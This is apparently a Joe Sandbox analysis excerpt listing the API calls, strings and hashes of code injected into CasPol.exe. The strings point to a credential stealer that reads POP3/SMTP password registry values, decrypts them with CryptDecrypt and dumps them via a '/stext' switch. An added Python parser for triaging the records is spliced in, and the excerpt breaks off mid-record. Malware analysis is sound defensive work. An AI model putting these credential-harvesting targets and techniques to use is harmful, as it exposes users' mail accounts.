                                                                                                                                                                                    • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1208763047-0
                                                                                                                                                                                    • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                    • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                      • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                      • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Closememset$EnumOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1938129365-0
                                                                                                                                                                                    • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                    • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                    • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
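The records above are the per-function output of the Joe Sandbox IDA plugin for the code injected into CasPol.exe: the API calls each function makes (with call-site addresses, and calls made via a subcall marked as such), the memory dump the function was recovered from, and similarity identifiers. The Python below is an added example and is not Joe Sandbox code or part of this report. It parses records in exactly this layout into dictionaries, reads the process ID and image base out of the .sdmp file name (the first field 0000001E is PID 30 in hex and the fourth field the base 0x400000, which is what the snapshot name hcaresult_30_2_400000_CasPol encodes), and tags functions by API combination and referenced string so an analyst can jump straight to the call sites worth reading. The sample text is the "/stext" record and the LoadLibraryA/GetProcAddress record from this section with the page indentation removed and unused hash lines dropped; the API_COMBOS and STRING_TAGS annotations are this example's own assumptions about what merits a second look, not findings stated by the report.

```python
"""Parse Joe Sandbox IDA-plugin function records and triage them.

Added example, not Joe Sandbox code. SAMPLE is two records copied from this
report section (indentation removed, unused hash lines dropped). API_COMBOS and
STRING_TAGS are this example's own annotations, not statements from the report.
"""
import re
from typing import Any, Dict, List, Tuple

SAMPLE = """\
APIs
  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
• _strcmpi.MSVCRT ref: 0040CEC3
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: strlen$_strcmpimemset
• String ID: /stext
• API String ID: 520177685-3817206916
• Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
APIs
  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
• LoadLibraryA.KERNEL32(?), ref: 0040473C
• GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID:
• API String ID: 145871493-0
"""

_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"  # caller, when indirect
    r"(?P<name>\w+)\.(?P<module>\w+)"                             # e.g. CreateFileA.KERNELBASE
    r"(?:\((?P<args>[^)]*)\))?"                                   # optional argument list
    r",? ref: (?P<ref>[0-9A-Fa-f]+)$"                             # call-site address
)

# Triage annotations: assumptions of this example, not report findings.
API_COMBOS: List[Tuple[set, str]] = [
    ({"LoadLibraryA", "GetProcAddress"}, "resolves imports at run time"),
    ({"VirtualProtect"}, "changes page protection"),
    ({"RegOpenKeyExA", "RegEnumKeyExA"}, "enumerates registry subkeys"),
]
STRING_TAGS: Dict[str, str] = {
    "/stext": "NirSoft-style '/stext' switch: dump recovered credentials to a text file",
    "sqlite3.dll": "SQLite engine, used to read browser credential and cookie databases",
}


def parse_records(text: str) -> List[Dict[str, Any]]:
    """Split the plugin dump into one dict per function."""
    records: List[Dict[str, Any]] = []
    rec: Dict[str, Any] = {"apis": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in _SECTIONS:
            # A record starts at "APIs"; a function with no API calls starts at
            # "Memory Dump Source" once the current record already has a source.
            if line == "APIs" or (line == "Memory Dump Source" and "Source File" in rec):
                if rec["apis"] or len(rec) > 1:
                    records.append(rec)
                rec = {"apis": []}
            section = line
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = _API_RE.match(body)
            if m is None:
                raise ValueError(f"unrecognised API line: {body!r}")
            rec["apis"].append({**m.groupdict(), "subcall": m.group("parent") is not None})
        elif section == "Strings":
            rec.setdefault("strings", []).append(body)
        else:
            key, _, value = body.partition(":")
            rec[key.strip()] = value.strip()
    if rec["apis"] or len(rec) > 1:
        records.append(rec)
    return records


def dump_origin(source_file: str) -> Tuple[int, int]:
    """PID and image base from the .sdmp name: field 0 is the PID in hex, field 3
    the base address (0000001E -> 30, matching hcaresult_30_2_400000_CasPol)."""
    fields = source_file.split(",")[0].strip().split(".")
    return int(fields[0], 16), int(fields[3], 16)


def triage(records: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Tag functions by API combination and referenced string; return tagged ones
    with the direct (non-subcall) call sites an analyst should open in IDA."""
    findings = []
    for rec in records:
        names = {a["name"] for a in rec["apis"]}
        tags = [tag for combo, tag in API_COMBOS if combo <= names]
        string_id = rec.get("String ID", "")
        if string_id in STRING_TAGS:
            tags.append(STRING_TAGS[string_id])
        if tags:
            findings.append({
                "opcode_id": rec.get("Opcode ID", ""),
                "api_id": rec.get("API ID", ""),
                "call_sites": [a["ref"] for a in rec["apis"] if not a["subcall"]],
                "tags": tags,
            })
    return findings


if __name__ == "__main__":
    for f in triage(parse_records(SAMPLE)):
        print(f["api_id"], f["call_sites"], f["tags"])
```

Subcall entries are kept in each record's API list so that a registry walk done through a helper (the RegOpenKeyExA/RegEnumKeyExA pairs above appear only as subcalls) still triggers a tag, while call_sites lists only the direct calls, which are the addresses present in this function's own body.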

APIs
  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
• LoadLibraryA.KERNEL32(?), ref: 0040473C
• GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID:
• API String ID: 145871493-0
                                                                                                                                                                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2928410991-0
                                                                                                                                                                                    • Opcode ID: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                    • Instruction ID: 8a3f31470ea8a8b3d952542b098f2abe59e4a6ac9f2d43bd6bb9c8582bf8d7d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d350ed5551c03cc907a7eb32ba1217be4922c2ffa8587e1fde7b1a80c71ac0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AD067B950010EFFDF01DFA0ED45DBE7BBDEB04208F008061BD15D2151D7719A15ABA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                    • Opcode ID: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                    • Instruction ID: d2a128bda891c33a071a1d1ce147914e72007c559b7d4fbb3b047f84c0d4c772
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0efd375066d84b9126104ad8b8140e0b1f33649f9e97a4d5cf1c1528608a19b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45D092B540020EFFDF018F81EC45EEE7BBDFB04348F104166BA05A6060E671AB55ABA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                    • Opcode ID: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                    • Instruction ID: 410abe984f7b5dc679d26b2641a37aa2388815a2676dab069d7a0e9e19a31d2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f65a168b1810926023e0ef961af8b8fe703345c76f3ebc05859e8d9c9091ddda
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECD0C93501020DFBDF01CF80DC06FDD7BBDEB05359F108054BA0095160C7759A10AB94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0040CF3F,00000000,00000000,00000000,?,?,0040D05D), ref: 0040C591
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                    • Instruction ID: 388ad9edf2a2a7c68189f8b324949551c1d57bd7625714ace597e57fc5aec2ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6d2970aaea062af5faf5536e9b68aca625b47ba2737de5872cf1d66a7157d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77B09B7681A53096D43577153405BDE135C9FD575474701EBB5043B28545187D4141DD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                    APIs
• FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
• Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
• Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
• Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04

APIs
• RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
• Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
• Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
• Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17

APIs
• GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
• Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
• Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
• Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
• GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
• GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
• GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
• GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
• GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
• GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
• GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
• GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
• GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
• API String ID: 2238633743-192783356
• Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
• Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48

APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• _mbscpy.MSVCRT(?,?), ref: 00402ECA
• _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
• _mbscpy.MSVCRT(?,?), ref: 00402F6A
• _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
• RegCloseKey.ADVAPI32(?), ref: 00402FD1
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscpy$QueryValue$CloseOpen
• String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
• API String ID: 52435246-1534328989
• Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
• Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
• Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
• Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98

APIs
• EmptyClipboard.USER32 ref: 00406E06
  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
• GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
• GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
• GlobalLock.KERNEL32(00000000), ref: 00406E41
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
• GlobalUnlock.KERNEL32(00000000), ref: 00406E63
• SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
• GetLastError.KERNEL32 ref: 00406E74
• CloseHandle.KERNEL32(?), ref: 00406E80
• GetLastError.KERNEL32 ref: 00406E8B
• CloseClipboard.USER32 ref: 00406E94
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
• Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
• Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
• Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9

APIs
• EmptyClipboard.USER32 ref: 00406EA7
• strlen.MSVCRT ref: 00406EB4
• GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
• GlobalLock.KERNEL32(00000000), ref: 00406ED0
• memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
• GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
• SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
• CloseClipboard.USER32 ref: 00406EFB
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
• String ID:
• API String ID: 3116012682-0
• Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
• Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
• Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
• Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9

Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
• Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
• Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
• Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
• Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59

Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                                                                                                    • API String ID: 1865533344-362086290
                                                                                                                                                                                    • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
